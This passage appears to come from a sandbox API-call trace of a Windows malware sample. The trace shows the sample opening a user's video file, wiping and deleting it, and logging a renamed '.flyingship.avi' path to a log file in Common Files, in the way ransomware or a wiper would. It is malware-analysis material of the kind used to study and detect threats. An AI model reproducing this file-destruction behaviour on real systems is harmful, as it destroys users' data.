lpsz="FILEWIPE") returned 0x8 [0197.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0197.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.019] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.021] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0xae6eb000, ftLastWriteTime.dwHighDateTime=0x1d5dad0, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 0x90af58 [0197.021] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0197.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.021] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.021] CharLowerBuffW (in: lpsz="byte[66249]", cchLength=0xb | out: lpsz="byte[66249]") returned 0xb [0197.022] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.022] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.022] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.022] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0197.022] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0197.022] FreeLibrary (hLibModule=0x75c90000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.023] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.023] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.023] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0197.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.023] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.024] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0197.024] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\c5jup_nf8xpmtrun_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0197.025] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.025] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.025] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0197.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.025] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.025] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.026] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.026] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0197.026] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.026] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.026] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.026] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.026] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.026] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.026] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.026] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpFilePart=0x0) returned 0x4e [0197.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0x1a58fb80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 0x90af58 [0197.026] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\c5jup_nf8xpmtrun_.avi")) returned 1 [0197.028] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb14b600, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xae6eb000, ftLastAccessTime.dwHighDateTime=0x1d5dad0, ftLastWriteTime.dwLowDateTime=0x1a58fb80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x102c9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="c5JuP_Nf8XPMTRuN_.avi", cAlternateFileName="C5JUP_~1.AVI")) returned 0 [0197.028] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.030] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.031] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.031] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.031] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.032] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.032] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.032] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.032] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.032] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0197.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0197.034] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x38a6, lpOverlapped=0x0) returned 1 [0197.035] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0197.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x38a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0197.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5d10 [0197.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\n", cchWideChar=92, lpMultiByteStr=0x9a5d10, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 92 [0197.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0197.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0197.035] WriteFile (in: hFile=0x158, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x5b, lpOverlapped=0x0) returned 1 [0197.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0197.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.035] CloseHandle (hObject=0x158) returned 1 [0197.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.037] PeekMessageW (in: lpMsg=0x87f5c4, 